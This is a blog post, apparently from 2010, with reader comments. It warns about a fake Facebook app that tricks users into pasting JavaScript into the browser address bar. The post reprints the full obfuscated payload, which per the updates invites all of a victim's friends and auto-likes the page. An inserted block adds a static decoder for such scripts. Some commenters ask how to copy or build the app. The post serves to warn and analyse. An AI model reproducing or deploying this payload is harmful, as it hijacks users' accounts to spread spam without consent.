Beware: Fake Facebook App

 

[Update 2: The following app has been removed by Facebook.]
[Update 1: The app invites all your friends, and likes the app automatically. It does not hack your account or cookie. Thanks Ahmud]

A perfectly crafted Facebook app to hack your account. Here is the URL: 10 lies girls ALWAYS tell guys! funny! (Do not follow the instructions unless you want your account to be compromised)

The app asks you to press <ctrl> + C, <alt> + D, <ctrl> + V and <enter> to paste a piece of JavaScript into your browser’s address bar. I don’t know what will happen next; follow the instructions if you want your account to be compromised :( .

The JavaScript it pastes:
javascript:(function(){a='app120196878004524_jop';b='app120196878004524_jode';ifc='app120196878004524_ifc';ifo='app120196878004524_ifo';mw='app120196878004524_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

The app has a hidden <textarea> with keyboard focus. When you press <ctrl> + C, its content gets selected, and then you follow the instructions to paste it into the address bar! Never ever do that.
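A static decoder for the two obfuscation layers visible in the pasted script (the p,a,c,k,e,r wrapper and the "\xNN" string array), added here as an example and not part of the original post. It only does text substitution and never calls eval(); the function names and the SAMPLE input are constructed for illustration.

```javascript
// Packer's base-N token for dictionary index n (same scheme as e(c) in the pasted script).
function token(n, radix) {
  const head = n < radix ? '' : token(Math.floor(n / radix), radix);
  const d = n % radix;
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Pull payload, radix, count and word list out of the wrapper as text; eval() is never called.
// Simplification (assumption): string escapes are reduced to "\c" -> "c", enough for \\ and \'.
function parsePacked(text) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(text);
  if (!m) return null; // not in p,a,c,k,e,r form
  const unesc = (s) => s.replace(/\\(.)/g, '$1');
  return { payload: unesc(m[1]), radix: +m[2], count: +m[3], words: unesc(m[4]).split('|') };
}

// Layer 1: swap every token for its dictionary word (an empty slot keeps the token as is).
function unpack({ payload, radix, count, words }) {
  const dict = new Map();
  for (let i = 0; i < count; i++) dict.set(token(i, radix), words[i] || token(i, radix));
  return payload.replace(/\b\w+\b/g, (w) => (dict.has(w) ? dict.get(w) : w));
}

// Layer 2: list the "\xNN\xNN..." string literals as readable text.
function hexStrings(src) {
  return [...src.matchAll(/"((?:\\x[0-9a-fA-F]{2})+)"/g)].map((m) =>
    m[1].replace(/\\x(..)/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
}

// Constructed sample in the same two-layer shape (not the script from the post).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,r){/* decoder omitted */}('1 2=["\\3\\4"];5(2[0])',62,6,'|var|s|x6f|x6b|log'.split('|'),0,{}))`;

// Returns the recovered source and its decoded strings, or null if the input is not packed.
function analyze(text) {
  const packed = parsePacked(text);
  if (!packed) return null;
  const source = unpack(packed);
  return { source, strings: hexStrings(source) };
}

console.log(analyze(SAMPLE));
```

Run it with Node.js on a saved copy of a suspicious snippet to read the recovered source and the decoded strings without executing anything from it.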










8 Comments

  1. aleksandar

    Can you please tell me…. when I use the script that is hidden and which the users copy with the keyboard commands does not work on other pages?

    in other words… can you tell me if I can copy their work
    I am not going to use it for spam purposes with nothing after joining the group

    Thank you in advance

    Posted on 08-May-10 at 10:35 pm | Permalink
  2. I do not know what the script does actually. Don't ever do that (to hack others' accounts), they will hunt you down :P .
    Note: you are not advised to copy and paste JavaScript into the address bar and run it.

    Posted on 08-May-10 at 10:39 pm | Permalink
  3. aleksandar

    :) thanks for the advice :)

    Posted on 08-May-10 at 10:43 pm | Permalink
  4. I managed to decode the Encrypted JS Line & Came to know that JS could not hack a Facebook account nor any other … It is used to select all your friends and invite them… And automatically Like the page. So it doesn't harm anybody at all.

    Hope you Understood
    ./Stateover

    Posted on 09-May-10 at 8:41 am | Permalink
  5. i read your post little late :(

    Posted on 10-May-10 at 12:05 am | Permalink
  6. Ashish

    Does anyone know how to create this application

    Posted on 13-May-10 at 8:38 am | Permalink
  7. ya.. it's good.. & everyone should know this

    Posted on 18-Sep-10 at 11:20 pm | Permalink
  8. pooja shah

    I read it, it's a very good blog which flashes light on hacking….
    Is this a kind of SQL Injection???

    Posted on 30-Oct-10 at 10:01 am | Permalink
